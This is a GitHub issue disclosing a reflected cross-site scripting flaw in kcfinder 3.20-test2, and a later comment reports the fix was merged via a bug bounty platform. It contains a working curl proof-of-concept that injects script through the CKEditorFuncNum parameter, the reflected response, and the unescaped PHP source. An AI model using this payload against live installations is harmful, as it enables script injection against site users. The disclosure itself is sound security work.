Cross-site Scripting Vulnerability #180

lowk3v · 2019-07-09T10:35:32Z

I discovered XSS vulnerability in kcfinder version 3.20-test2.
Payload

curl localhost/kcfinder/upload.php?type=files&CKEditor=editor1&CKEditorFuncNum=);}</script><script>alert(1);if(1){//&langCode=en

Response

<html><body><script type='text/javascript'>
var par = window.parent,
    op = window.opener,
    o = (par && par.CKEDITOR) ? par : ((op && op.CKEDITOR) ? op : false);
if (o !== false) {
    if (op) window.close();
    o.CKEDITOR.tools.callFunction();}</script><script>alert(1);//, '', 'You don\'t have permissions to upload files.');
} else {
    alert('You don\'t have permissions to upload files.');
    if (op) window.close();
}
</script></body></html>

Vulnerable code
in file core\class\uploader.php line 201

if (isset($_GET['CKEditorFuncNum'])) {
            $this->opener['name'] = "ckeditor";
            $this->opener['CKEditor'] = array('funcNum' => $_GET['CKEditorFuncNum']);

a var $_GET['CKEditorFuncNum']) was not escape by htmlentities().

The text was updated successfully, but these errors were encountered:

huntr-helper · 2020-08-20T10:29:14Z

‎‍🛠️ A fix has been provided for this issue. Please reference: 418sec#1

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.

Mik317 mentioned this issue Aug 14, 2020

[FIX] XSS through blacklisting and htmlentities() 418sec/kcfinder#1

Merged

huntr-helper mentioned this issue Aug 20, 2020

Security Fix for Cross-site Scripting (XSS) - huntr.dev #186

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Cross-site Scripting Vulnerability #180

Cross-site Scripting Vulnerability #180

lowk3v commented Jul 9, 2019

huntr-helper commented Aug 20, 2020

Cross-site Scripting Vulnerability #180

Cross-site Scripting Vulnerability #180

Comments

lowk3v commented Jul 9, 2019

huntr-helper commented Aug 20, 2020